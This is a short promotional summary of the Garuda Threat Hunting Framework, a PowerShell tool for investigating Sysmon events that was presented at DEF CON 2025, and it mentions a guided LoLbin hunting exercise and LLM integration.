Garuda – Threat Hunting and Investigation Framework (cysinfo.com)

The Garuda Threat Hunting Framework, unveiled at DEF CON 2025, is a cutting-edge PowerShell tool designed to enhance manual threat hunting capabilities. By allowing users to efficiently correlate, filter, and investigate Sysmon events, Garuda streamlines the process of identifying potential security threats. The release includes a practical demonstration of its installation, core features, and a guided hunting exercise through a Living-off-the-Land (LoLbin) attack using real telemetry data. This framework is particularly significant for the AI/ML community as it incorporates advanced techniques to facilitate endpoint investigations and empower cybersecurity professionals with robust manual hunting skills. Notably, Garuda's integration with Large Language Models (LLMs) enables AI-driven threat detection and response, reflecting a growing trend towards the utilization of AI in cybersecurity. This not only enhances investigation accuracy but also reduces the time taken to respond to potential threats, paving the way for more proactive security measures in the ever-evolving landscape of cyber threats.